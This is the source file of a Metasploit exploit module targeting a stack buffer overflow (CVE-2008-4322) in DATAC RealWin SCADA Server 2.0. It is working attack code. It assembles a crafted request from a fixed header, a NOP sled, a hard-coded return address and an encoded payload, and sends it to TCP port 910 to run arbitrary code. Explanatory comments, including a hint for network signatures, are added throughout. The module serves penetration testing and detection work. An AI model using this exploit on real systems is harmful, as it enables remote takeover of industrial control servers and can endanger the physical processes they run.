Path: blob/master/modules/exploits/windows/scada/realwin.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for the DATAC RealWin SCADA Server stack buffer
# overflow tracked as CVE-2008-4322 (see 'References' below). The module
# sends a single TCP request to the RealWin service and hands control to the
# framework payload handler; all values it transmits are either the fixed
# constants below or framework-generated padding/payload bytes.
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability ranking for this module.
  Rank = GreatRanking

  # Provides connect/disconnect and the `sock` object used in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, target)
  # and the single option RPORT, defaulting to TCP port 910.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'DATAC RealWin SCADA Server Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in DATAC Control
          International RealWin SCADA Server 2.0 (Build 6.0.10.37).
          By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,
          an attacker may be able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-4322' ],
          [ 'OSVDB', '48606' ],
          [ 'BID', '31418' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # Maximum encoded payload size the module reserves in the request.
          'Space'    => 550,
          # Byte values the encoded payload must not contain:
          # NUL, space, LF and CR.
          'BadChars' => "\x00\x20\x0a\x0d",
          # Stack adjustment applied by the framework before the payload runs
          # (framework semantics; value is as shipped in the module).
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Single hard-coded return address and padding length. Because the
          # address is a fixed constant, the module presumably depends on the
          # memory layout of the specific build named in the Description
          # (2.0 Build 6.0.10.37) — TODO confirm against the advisory.
          [ 'Universal', { 'Offset' => 740, 'Ret' => 0x4001e2a9 } ], # Thanks Jacopo!
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2008-09-26'))

    # Default RealWin listener port used by this module. For defenders, traffic
    # to this port carrying the fixed 18-byte header assembled in #exploit is
    # the invariant part of the request a network signature can key on.
    register_options([Opt::RPORT(910)])
  end

  # Connects to RPORT, builds the request buffer and sends it once, then
  # starts the framework payload handler and closes the socket.
  #
  # Buffer layout, in order: four little-endian 32-bit constants plus two NUL
  # bytes (an 18-byte fixed header), a NOP sled of target['Offset'] bytes,
  # the target return address, one further constant dword, the encoded
  # payload, and a trailing 1024-byte NOP sled.
  def exploit
    connect

    # Fixed request header; pack('V') emits each value as a little-endian
    # unsigned 32-bit integer.
    data = [0x67542310].pack('V')
    data << [0x00000800].pack('V')
    data << [0x000a77e3].pack('V')
    data << [0x00040005].pack('V')
    data << "\x00\x00"
    # Padding up to the overwritten return address (740 bytes for the default target).
    data << make_nops(target['Offset'])
    data << [target.ret].pack('V')
    # Constant dword following the return address; its role is not stated in
    # the module — TODO confirm.
    data << [0x00404040].pack('V')
    data << payload.encoded
    data << make_nops(1024)

    print_status("Trying target #{target.name}...")
    # Consume the server's initial response (presumably a banner) before
    # sending; the received bytes are discarded.
    sock.get_once
    sock.put(data)

    # Start the payload handler, then close the connection.
    handler
    disconnect
  end
end